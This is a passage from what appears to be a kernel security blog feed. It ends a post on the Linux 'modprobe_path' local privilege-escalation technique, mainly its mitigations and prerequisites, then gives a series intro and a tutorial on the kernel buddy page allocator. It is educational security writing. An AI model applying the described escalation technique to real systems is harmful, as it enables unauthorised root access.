}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/kernel/umh.c#L358">kernel/umh.c</a> (v5.18.5)</figcaption></figure><p>It is then the task of the static executable defined by <code>CONFIG_STATIC_USERMODEHELPER_PATH</code> to call the appropriate usermode helper, e.g. <code>/usr/bin/modprobe</code>. </p><p>Alternatively, <code>CONFIG_STATIC_USERMODEHELPER</code> can be enabled but <code>CONFIG_STATIC_USERMODEHELPER_PATH</code> can be set to <code>&quot;&quot;</code>, disabling all usermode helper programs entirely and completely mitigating the <code>modprobe_path</code> technique.</p><h4 id="so-were-all-good">So We&apos;re All Good?</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/07/whats_the_big_deal.gif" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="480" height="270"></figure><p>Awesome, you mean this whole thing was patched back in 2017? EZ PZ, next technique pls. Not so fast! Despite being introduced into the kernel back in 4.11, it still hasn&apos;t made its way into the default configurations for many popular distributions.</p><p>As of writing, this includes the latest versions of Ubuntu, Fedora and EndeavourOS; I&apos;m sure there&apos;s many more but that&apos;s all I know off the top of my head.</p><p>You can check your system by searching your config, typically in <code>/boot/config...</code> or <code>/proc/config</code>, for <code>CONFIG_STATIC_USERMODEHELPER</code>. Alternatively I heartily recommend <a href="https://twitter.com/a13xp0p0v">@a13xp0p0v</a>&apos;s <a href="https://github.com/a13xp0p0v/kconfig-hardened-check">kconfig-hardened-check</a>.</p><p>I don&apos;t mean to point fingers though, the Linux ecosystem is vast and complex, with many moving parts and users. 
I can imagine there&apos;s plenty of components that make assumptions about/rely on <code>usermodehelper</code>, making removing it outright (via not setting <code>CONFIG_STATIC_USERMODEHELPER_PATH</code>) difficult.</p><p>The alternative is to implement the single usermode helper in such a way as to securely carry out the same functionality for users of <code>usermodehelper</code> while still mitigating similar attack surfaces and not introducing new ones.</p><h4 id="alternatives">Alternatives</h4><p><code>CONFIG_STATIC_USERMODEHELPER</code> isn&apos;t the only way to mitigate this technique, but it is one of the more direct, having been designed with this attack surface in mind.</p><p>From the code analysis earlier, some of you will also have noticed the more heavy-handed approach of disabling <code>CONFIG_MODULES</code> entirely, preventing the <code>request_module()</code> code path from being reachable, or any module loading for that matter - certainly an effective mitigation.</p><p>However, this approach suffers the same issue (though to a greater extent) as disabling <code>usermodehelper</code>, in that it&apos;s gonna remove a pretty integral feature that many aspects of modern distros have come to make use of for your average user.</p><p>That&apos;s not to say there isn&apos;t an argument for disabling autoloading, reducing a broader attack surface than <code>CONFIG_STATIC_USERMODEHELPER</code>; it all depends on use case. </p><hr><ol><li><a href="http://www.vishalchovatiya.com/program-gets-run-linux/">http://www.vishalchovatiya.com/program-gets-run-linux/</a></li><li>From the comment above <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18">struct linux_binprm</a></code> definition</li><li>e.g. 
<code>load_elf_binary()</code>, <code>load_script()</code> </li><li><a href="https://cateee.net/lkddb/web-lkddb/MODULES.html">CONFIG_MODULES</a> enables loadable module support, without this we can&apos;t <code>modprobe</code> new modules into the kernel</li><li>I believe the intention behind this check is to ignore invoking <code>request_module()</code> for plain-text files (that haven&apos;t already been picked up by <code>binfmt_script</code> at this point), under the assumption other binary formats will have at least one non-printable byte.</li><li>If KASLR is present we also need an information leak to know the address of kernel symbols, e.g. <code>modprobe_path</code>, in order to overwrite it </li><li><a href="https://www.redhat.com/sysadmin/suid-sgid-sticky-bit">https://www.redhat.com/sysadmin/suid-sgid-sticky-bit</a></li><li><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html">https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html</a></li><li><a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64e90a8acb8590c2468c919f803652f081e3a4bf">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64e90a8acb8590c2468c919f803652f081e3a4bf</a></li><li><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER_PATH.html">https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER_PATH.html</a></li><li>Which while doable, shifts the requirements from arbitrary kernel address write to a very lenient ROP chain or some kernel shellcode execution</li></ol><h2 id="conclusion">Conclusion</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/07/i_think_our_work_here_is_done.gif" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="500" height="282"></figure><p>Not gonna lie, I thought this series might be an opportunity for me to whack out some shorter &lt;1000 word posts, but alas. 
Regardless, hopefully I&apos;ve given you some useful insight into, and an understanding of, a popular technique used in kernel exploit development to achieve local privilege escalation on modern kernels.</p><p>Although an effective mitigation exists within the kernel, this doesn&apos;t protect anyone unless it&apos;s enabled in the kernel configuration. This technique is particularly popular among attackers, as it&apos;s a relatively low-maintenance technique, requiring the offset for only one kernel symbol: <code>modprobe_path</code>. Of course, you still need an AAW primitive.</p><p>Going forward, there&apos;s plenty more content for me to dive into. If you have anything in particular you&apos;re eager for me to cover, feel free to <a href="https://twitter.com/sam4k1">@me</a>. </p><p>Some ideas include tackling the various aspects of heap feng shui, ROP chains and their various sub-strands, broader approaches to exploiting various bug types such as use-after-frees, overflows etc. The list goes on and on! But that&apos;s all for now.</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[LiKE: A Series on Linux Kernel Exploitation]]></title><description><![CDATA[Thought the Linternals series was hype? Get ready for the even SEO friendlier LiKE, a series on Linux kernel exploitation.]]></description><link>https://sam4k.com/like-a-series-on-linux-kernel-exploitation/</link><guid isPermaLink="false">6266f3bd1b5b6d052837bfe7</guid><category><![CDATA[linux]]></category><category><![CDATA[VRED]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Mon, 04 Jul 2022 14:50:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/04/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/04/tired_computer.gif" alt="LiKE: A Series on Linux Kernel Exploitation"><p>So you thought the <a href="https://sam4k.com/linternals-introduction/">Linternals</a> series was hype? 
Get ready for the even SEO friendlier LiKE, a series on all things Linux kernel exploitation.</p><p>I just couldn&apos;t help myself, despite spending my work days doing kernel exploit development, I&apos;m just that keen that I want to also cover it on my personal blog. </p><p>Seriously though, I think it&apos;s an extremely interesting topic for us to cover and will tie in nicely with the kernel internals knowledge we pick up from the <a href="https://sam4k.com/linternals-introduction/">Linternals</a> series. </p><p>Highlighted well in P0&apos;s recent post <a href="https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html">&quot;The More You Know, The More You Know You Don&#x2019;t Know&quot;</a>, I think there is value in sharing and educating industry on the methodology and techniques that are being used by attackers. Plus kernel stuff is just cool right?</p><p>In terms of actual content, there&apos;s lots of scope for topics we can cover, and I&apos;m happy to hear your thoughts and suggestions. I have a few different areas I&apos;d like to cover:</p><ul><li><strong>Kernel exploitation techniques</strong>: often times kernel exploitation techniques are covered as part of a broader post on exploiting a particular bug, so I want to spend some time putting the spotlight on specific techniques - talking about when, why and how they&apos;re used as well as covering existing, future or possible mitigations. </li><li>Perhaps also highlighting <strong>mitigations</strong>? 
Talking about existing or upcoming security mitigations and how they impact(ed) the kernel exploitation space</li><li><strong>Classic kernel writeups</strong>: whether CTFs or real world PoCs, I&apos;m happy to spend some time providing technical coverage/analysis of cool stuff if that content isn&apos;t already out there</li></ul><p>Feel free to fire any questions, suggestions or *gasp* corrections my way <a href="https://twitter.com/sam4k1">@sam4k</a>.</p><h2 id="contents">Contents</h2><p><s>Similar to the Linternals post, going forward I&apos;ll keep this up-to-date as a sort of table of content for published posts in the LiKE series.</s></p><p>I&apos;ve since moved the contents to a <a href="https://sam4k.com/kernel-exploitation/">standalone page</a>, which you can reach from the navigation bar at the top, to keep things a bit more organised!</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Linternals: Introducing Memory Allocators & The Page Allocator]]></title><description><![CDATA[I know you've all been waiting for it, that's right, we're going to be taking a dive into another exciting aspect of Linux internals: memory allocators! ]]></description><link>https://sam4k.com/linternals-memory-allocators-part-1/</link><guid isPermaLink="false">61cdb1e6484d4d42c8e4a679</guid><category><![CDATA[linternals]]></category><category><![CDATA[linux]]></category><category><![CDATA[memory]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Fri, 10 Jun 2022 16:30:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/04/linternals.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/04/linternals.gif" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator"><p>I know you&apos;ve all been waiting for it, that&apos;s right, we&apos;re going to be taking a dive into another exciting aspect of Linux internals: memory allocators! 
</p><p>Don&apos;t worry, I haven&apos;t forgotten about the <a href="https://sam4k.com/linternals-virtual-memory-part-1/">virtual memory series</a>, but today I thought we&apos;d spice things up and shift our focus towards memory allocation in the Linux kernel. As always, I&apos;ll aim to lay the groundwork with a high level overview of things before gradually diving into some more detail.</p><p>In this first part (of many, no doubt), we&apos;ll cover the role of memory allocators within the Linux kernel at a high level to give some general context on the topic. We&apos;ll then take a look at the first of two types of allocator used by the kernel: the buddy (page) allocator. </p><p>We&apos;ll cover the high level implementation of the buddy allocator, with some code snippets from the kernel to complement this understanding, before diving into some more detail and wrapping things up by talking about some pros/cons of the buddy allocator. </p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#0x01-so-memory-allocators">0x01 So, Memory Allocators?</a></li>
<li><a href="#0x02-the-buddy-page-allocator">0x02 The Buddy (Page) Allocator</a>
<ul>
<li><a href="#page-primer">Page Primer</a></li>
<li><a href="#buddy-system-algorithm">Buddy System Algorithm</a></li>
<li><a href="#nodes-zones-memory-stuff">Nodes, Zones &amp; Memory Stuff</a>
<ul>
<li><a href="#expanding-on-freearea">Expanding on free_area</a></li>
<li><a href="#touching-on-struct-page">Touching on struct page</a></li>
</ul>
</li>
<li><a href="#using-the-buddy-allocator">Using The Buddy Allocator</a></li>
<li><a href="#pros-cons">Pros &amp; Cons</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="0x01-so-memory-allocators">0x01 So, Memory Allocators?</h2><p>Alright, let&apos;s get stuck in! Like I mentioned, we&apos;ll start with the basics - what is a memory allocator? I could just say we&apos;re talking about a collection of code which looks to manage available memory, typically providing an API to <code>allocate()</code> and <code>free()</code> this memory.</p><p>But what does that mean? For a moment let&apos;s forget about the complexities of modern-day memory management in OSes, with all the various interconnected components:</p><p>Picture a computer with some physical memory, running a Linux kernel and a lot of usermode processes (think of all the chrome tabs). Both the kernel and the various user processes require physical memory to store the various data behind the virtual mappings we covered in parts <a href="https://sam4k.com/linternals-virtual-memory-0x02/">2</a> &amp; <a href="https://sam4k.com/linternals-virtual-memory-part-3/">3</a> of the virtual memory series. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/this_is_fine.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="270"></figure><p>Now picture the absolute chaos as processes are using the same physical memory addresses at the same time, clobbering each other&apos;s data, oh lord, even the kernel&apos;s data is getting overwritten? Is that chrome tab even using a physical address that exists?!</p><p>That is where the kernel&apos;s memory allocator comes in, acting as a gatekeeper of sorts for allocating memory when it is needed. Its job is to keep track of how much memory there is, what&apos;s free and what&apos;s in use. 
</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/you_shall_not_pass.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="200"></figure><p>Rather than every process for themselves, if something requires a chunk of memory to store stuff in, it asks the memory allocator - simple enough, right? </p><h2 id="0x02-the-buddy-page-allocator">0x02 The Buddy (Page) Allocator </h2><p>Now we&apos;ve got a high-level understanding of memory allocators, let&apos;s take a look at how memory is managed and allocated in the Linux kernel. </p><p>While several implementations for memory allocation exist within the Linux kernel, they mainly work on top of the buddy allocator (aka page allocator), making it the fundamental memory allocator within the Linux kernel.</p><h3 id="page-primer">Page Primer</h3><p>At this point, we should probably rewind and clarify what exactly a &quot;page&quot; is. As part of its memory management approach, the Linux kernel (along with the CPU) divides virtual memory into &quot;pages&quot; which are <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18">PAGE_SIZE</a></code> bytes of contiguous virtual memory.</p><p>Typically defined as <code>0x1000</code> bytes, or 4KB, pages are the common unit for managing memory in the Linux kernel. This is why you&apos;ll often see things in memory aligned on page boundaries, for example. </p><p>Anyway, while a fascinating topic, I&apos;ll not derail us too much! 
However, this is definitely something I&apos;ll touch on in more detail in future posts, so don&apos;t worry :) </p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2757;</div><div class="kg-callout-text">Going forward, unless I&apos;m explicit, in examples using <code>PAGE_SIZE</code>, I&apos;ll assume a typical <code>PAGE_SIZE</code> of <code>0x1000</code>.</div></div><h3 id="buddy-system-algorithm">Buddy System Algorithm</h3><p>Back to the topic at hand - we&apos;ve covered where the &quot;page&quot; in page allocator comes from, what about the buddy part? Cue the buddy system algorithm (BSA) behind the buddy allocator, starting with the basics:</p><p>The buddy allocator tracks <strong>free</strong> chunks of <strong>physically contiguous</strong> memory via a freelist, <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L632">free_area[MAX_ORDER]</a></code>, which is an array of <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L108">struct free_area</a></code>. </p><p>Each <code>struct free_area</code> in the freelist contains a doubly linked circular list (the <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/types.h#L178">struct list_head</a></code>) pointing to the free chunks of memory.</p><figure class="kg-card kg-code-card"><pre><code>...
struct free_area        free_area[MAX_ORDER]; 
...

struct free_area {
    struct list_head    free_list; 
    unsigned long       nr_free;
};</code></pre><figcaption><strong>simplified</strong> from <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h">/include/linux/mmzone.h</a></figcaption></figure><p>Each <code>struct free_area</code>&apos;s linked list points to free, physically contiguous chunks of memory which are all the same size. The buddy allocator uses the index into the freelist, <code>free_area[]</code>, to categorise the size of these free chunks of memory. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/image-3.png" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="859" height="208" srcset="https://sam4k.com/content/images/size/w600/2022/06/image-3.png 600w, https://sam4k.com/content/images/2022/06/image-3.png 859w" sizes="(min-width: 720px) 720px"></figure><p>This index is called the &quot;order&quot; of the list, such that the size of the free chunks of memory pointed to are of size <code>2<sup>order</sup> * <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18">PAGE_SIZE</a></code>, such that:</p><ul><li><code>free_area[0]</code> points to a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>2<sup>0</sup> * 0x1000</code> bytes == <code>0x1000</code> bytes AKA order-0 pages. 
</li><li><code>free_area[1]</code> points to a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>2<sup>1</sup> * 0x1000</code> bytes == <code>0x2000</code> bytes AKA order-1 pages.</li><li>...</li><li><code>free_area[<a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L28">MAX_ORDER</a> - 1]</code> (the highest valid index) points to a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>2<sup>MAX_ORDER - 1</sup> * 0x1000</code> bytes</li></ul><p>Okay, what&apos;s this got to do with buddies Sam?! Good question! One that brings us onto how the buddy allocator (de)allocates all this free memory it tracks.</p><p>Being the buddy <strong><em>allocator</em></strong>, it provides an API for users to both allocate and free all these variously sized, physically contiguous chunks of memory. If we want to call the equivalent of <code>allocate(0x4000 bytes)</code>, what does this look like at a high level?</p><p>1) Determine what order-n page satisfies the size of our allocation; in maths world, they do this via log stuff: <code>log<sub>2</sub>(alloc_size_in_pages)</code>, rounded up to the nearest int, will give us the appropriate order! Here, it&apos;s 2.</p><p>2) As the order is also the index into the freelist, we can check the corresponding <code>free_area[2]-&gt;free_list</code> to find a free chunk. If there is one, hoorah! We dequeue it from the list as it&apos;s no longer free and we can tell the caller about their newly acquired memory</p><p>3) However, if <code>free_area[2]-&gt;free_list</code> is empty, the buddy allocator will check the <code>free_list</code> of the next order up, in this case <code>free_area[3]-&gt;free_list</code>. 
If there&apos;s a free chunk, the allocator will then do the following:</p><ul><li>Remove the chunk from <code>free_area[3]-&gt;free_list</code></li><li>Halve the chunk (as any order-n page is guaranteed to be exactly twice the size of the order-n-1 page, as well as being physically contiguous in memory), creating two buddies! (I told you we&apos;d get round to it!)</li><li>One chunk is returned to the caller who requested the allocation, while the other chunk is now migrated to the order-n-1 list, <code>free_area[2]-&gt;free_list</code> in this case</li><li>On freeing, the allocator will check for physically adjacent, free chunks (buddies!) to remerge to higher orders if a <code>free_list</code> has too many freed chunks</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2022/06/buddy_split.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="732" height="172"><figcaption>that&apos;s right, i made a gif</figcaption></figure><p>4) If <code>free_area[3]-&gt;free_list</code> is also empty, the allocator will continue to check the higher-order freelists until either it finds a free chunk or the request fails (if there are no free chunks in any of the higher orders either). </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/we_made_it.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="200"></figure><p>And there we are, a grossly-simplified (as always) overview of the buddy allocator within the Linux kernel. 
Perhaps I made a mistake intertwining code snippets and kernel specifics with a simplified approach, but hopefully it all made sense!</p><h3 id="nodes-zones-memory-stuff">Nodes, Zones &amp; Memory Stuff</h3><p>Okay, so we&apos;ve covered things at a fairly high level, but I&apos;d be remiss if I didn&apos;t clarify some of the specifics I glossed over in the last section, so buckle up.</p><p>First of all, in theme with our ongoing virtual memory series, let&apos;s clarify what exactly is being allocated here. We already know we&apos;re dealing with pages of memory, but where? </p><p>The buddy allocator is a virtual memory allocator, although it allocates from the kernel region defined by <code>__PAGE_OFFSET_BASE</code> (aka lowmem aka physmap) which you&apos;ll recall<sup><a href="https://sam4k.com/linternals-virtual-memory-part-3/">[1]</a></sup> is a 1:1 virtual mapping of physical memory. Such that if lowmem address x maps to physical address y, then x+1 will map to y+1, x+2 to y+2, x+N to y+N etc; virtually contiguous memory from this region is guaranteed also to be physically contiguous too. 
</p><p>Keeping things relatively brief again, the Linux kernel organises physical memory into a tree-like hierarchy of <em>nodes</em> made up of <em>zones</em> made up of <em>page frames<sup>[2]</sup>:</em></p><ul><li><strong>Nodes</strong>: these data structures, represented by <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L934">pg_data_t</a></code>, are abstractions of actual physical hardware stuff, specifically a node represents a &quot;bank&quot; of physical memory</li><li><strong>Zones</strong>: suffice to say nodes are made up of zones, represented by <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L514">struct zone</a></code>, which represent ranges within memory </li><li><strong>Page frames</strong>: zones are then made up of pages, represented by <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72">struct page</a></code>. Where a page describes a fixed-length (<code>PAGE_SIZE</code>) contiguous block of virtual memory, a page frame is a fixed-length contiguous block of physical memory that pages are mapped to</li></ul><h4 id="expanding-on-freearea">Expanding on <code>free_area</code></h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/why_doing_this_to_me.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="270"></figure><p>Why am I burdening you with this knowledge? The answer is because not only did I leave out some details in the code snippet above, I straight up altered it (it was for your own good, I swear), so now I&apos;m going to correct my wrongs by unveiling the truth:</p><pre><code class="language-C">struct free_area {
    struct list_head    free_list[MIGRATE_TYPES]; 
    unsigned long       nr_free;
};

struct zone {
    ...
    /* free areas of different sizes */
    struct free_area    free_area[MAX_ORDER]; 
    ...
}</code></pre><p>Okay, let&apos;s unpack this. The buddy allocator actually keeps track of multiple freelists, <code>free_area[]</code>, specifically one per zone. We can see that here, as the freelist is actually a member of the <code>struct zone</code> which we touched on a moment ago.</p><p>Why? Err, good question. I won&apos;t delve into the nuances of NUMA/UMA systems and all that stuff but suffice to say when the buddy allocator is asked to allocate some memory, it may want to pick a zone from the node that is associated with the calling context (think &quot;closest&quot; node or most optimal).</p><p>Now that we have the full(ish) context, we can do a little bit of introspection and get some hands on using our ol&apos; faithful <code>procfs</code>:</p><pre><code>$ cat /proc/buddyinfo 
----- zone info ------|    0   |  1   |  2   |  3   |  4   |  5   |  6   |  7   |  8   |  9   | 10  
-------------------------------------------------------------------------------------------------
Node 0, zone      DMA      0      0      0      0      0      0      0      0      1      1      2 
Node 0, zone    DMA32  11311   2358   1052    567    290    123     52     33     18     25      8 
Node 0, zone   Normal   5977    942   2093   1983    804    256     93     45     28     39      4 </code></pre><p>I&apos;ve added some headers in (lines 2-3), but what we&apos;re seeing here is a row for each zone&apos;s buddy allocator freelist, <code>free_area[MAX_ORDER]</code>. The first column tells us the node and zone, then each column after that tells us how many free pages (<code>nr_free</code>) there are for each page order, starting from order 0 and moving to order <code>MAX_ORDER</code>. Neat, right?</p><p>Moving back to the deception, the doubly linked circular list we said pointed to all the free chunks? Well that&apos;s actually an array of linked circular lists: <code>free_list[MIGRATE_TYPES]</code>. Don&apos;t worry though, each list in the array still points to free chunks. Pages of different types, defined by the enum <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L67">MIGRATE_TYPES</a></code>, are just stored in separate lists in this array.</p><h4 id="touching-on-struct-page">Touching on <code>struct page</code></h4><p>Although I&apos;m planning to cover this in much more detail in the virtual memory series, I feel like it&apos;s worth touching on this goliath to fill in some gaps in our overview.</p><p>So we&apos;ve already mentioned that each physical page (page frame) in the system has a <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72">struct page</a></code> associated with it. This tracks various metadata and is instrumental to the kernel&apos;s memory management model.</p><p>Given that these represent physical pages, it might not come as a surprise to learn that the &quot;free chunks&quot; that <code>free_area-&gt;free_list</code> points to are actually references to page structs. 
We can see that here by poking around <a href="https://elixir.bootlin.com/linux/v5.18.3/source/mm/page_alloc.c#L2986">mm/page_alloc.c</a>:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">/*
 * Do the hard work of removing an element from the buddy allocator.
 * Call me with the zone-&gt;lock already held.
 */
static __always_inline struct page *
__rmqueue(struct zone *zone, unsigned int order, int migratetype,
						unsigned int alloc_flags)</code></pre><figcaption>Note the return type here, struct page * (we also see familiar qualifiers: zone, order, migrate type and flags)</figcaption></figure><p>Okay, whew, with that all cleared up, I think we have a reasonable overview of the buddy allocator within the Linux kernel! Hope you&apos;re still with me as we&apos;re not done yet!</p><hr><ol><li><a href="https://sam4k.com/linternals-virtual-memory-part-3/">https://sam4k.com/linternals-virtual-memory-part-3/</a></li><li>More on the topic here <a href="https://www.kernel.org/doc/gorman/html/understand/understand005.html">https://www.kernel.org/doc/gorman/html/understand/understand005.html</a></li></ol><h3 id="using-the-buddy-allocator">Using The Buddy Allocator</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/i_want_to_try.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="268"></figure><p>I figured I should get into the habit of promoting some kernel development hijinx and explore some of the APIs for the topics we discuss where relevant. </p><p>Let&apos;s dive in then and highlight some of the API exposed to kernel developers for use in modules &amp; device drivers. 
All defs can be found in <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h">/include/linux/gfp.h</a></code>:</p><ul><li><code>alloc_pages(gfp_mask, order)</code>: Allocate 2<sup><em>order</em></sup> pages (one physically contiguous chunk from the order N freelist) and return a <code>struct page</code> address</li><li><code>alloc_page(gfp_mask)</code>: macro for <code>alloc_pages(gfp_mask, 0)</code></li><li><code>__get_free_pages(gfp_mask, order)</code> and <code>__get_free_page(gfp_mask)</code> mirror the above functions, except they return a virtual address to the allocation as opposed to a <code>struct page</code></li><li>For freeing, options include: <code>__free_page(struct page *page)</code>, <code>__free_pages(struct page *page, order)</code> and <code>free_page(void *addr)</code></li><li>Plenty more to see if you take a browse of <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h">/include/linux/gfp.h</a></code></li></ul><p>Most of that should be fairly familiar at this point, except the <code>gfp_mask</code>, which we haven&apos;t covered. The <code>gfp_mask</code> is a set of GFP (Get Free Page) flags which let us configure the behaviour of the allocator and are used across the kernel&apos;s memory management code.</p><p>The inline documentation<sup><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271">[1]</a></sup> already does a good job at covering the different flags, so I won&apos;t rehash that here. In my experience, the ones you&apos;ll mainly see are <code>GFP_KERNEL</code>, <code>GFP_KERNEL_ACCOUNT</code><sup>[2]</sup> and <code>GFP_ATOMIC</code>.</p><p>Despite the flexible API for different allocation use cases and requirements, they all ultimately call the real MVP, <code>__alloc_pages()</code>: </p><figure class="kg-card kg-code-card"><pre><code>/*
 * This is the &apos;heart&apos; of the zoned buddy allocator.
 */
struct page *__alloc_pages(gfp_t gfp, unsigned int order, int preferred_nid,
							nodemask_t *nodemask)</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.3/source/mm/page_alloc.c#L5370">/mm/page_alloc.c</a></figcaption></figure><p>We&apos;ve already covered a lot of ground in this post, so I&apos;ll leave it as an exercise to the reader to take a look at this function to see what we&apos;ve covered so far in actual code :)</p><p>I&apos;ll also use this as an opportunity to plug my long-neglected repo (but I plan to push some demos for Linternals posts up too, maybe), &quot;lmb&quot; aka Linux Misc driver Boilerplate; a very lightweight kernel module boilerplate for bootstrapping kernel fun. </p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/sam4k/lmb"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - sam4k/lmb: Very lightweight kernel module boilerplate for kernel development/testing.</div><div class="kg-bookmark-description">Very lightweight kernel module boilerplate for kernel development/testing. 
</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">sam4k</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/6f1e8f53726bbb637614ea9872b48678653de986a0f9087367d6c97501146f39/sam4k/lmb" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator"></div></a></figure><hr><ol><li><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271">https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271</a></li><li><a href="https://twitter.com/poppop7331">@poppop7331</a> and <a href="https://twitter.com/vnik5287">@vnik5287</a> recently <a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">did a cool blog</a> post covering modern heap exploitation, including the implications of <code>GFP_KERNEL_ACCOUNT</code> in recent kernel versions :) </li></ol><h3 id="pros-cons">Pros &amp; Cons</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/impatient_judy.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="234" height="176"></figure><p>Before we wrap up, and to give some context on the next section, let&apos;s take what we&apos;ve learned about the buddy allocator and highlight some of its pros and cons.</p><p>First of all, due to the nature of the buddy system algorithm behind things, the buddy allocator is fast to (de)allocate memory. 
Furthermore, being able to split and remerge chunks on the go, there is little external fragmentation (this is where there&apos;s enough free memory to serve a request, just not in one contiguous chunk).</p><p>There are also other perf benefits, which we won&apos;t dive into here, to providing physically contiguous memory and guaranteeing cache-aligned memory blocks.</p><p>The main downside here is the internal fragmentation, where the chunk of memory allocated is bigger than necessary, leaving a portion of it unused. Due to the fixed sizes, determined by 2<sup>order</sup> pages, if a request falls just too big for the previous order, we&apos;re gonna have a great deal of space wasted. Not to mention the smallest allocation is 1 page.</p><p>tl;dr: fast, contiguous allocations, low external fragmentation, bad internal fragmentation</p><h3 id="wrapping-up">Wrapping Up</h3><p>Memory allocation and management is an extremely complex topic with a lot of nuance which, as we saw, extends down to the hardware level. 
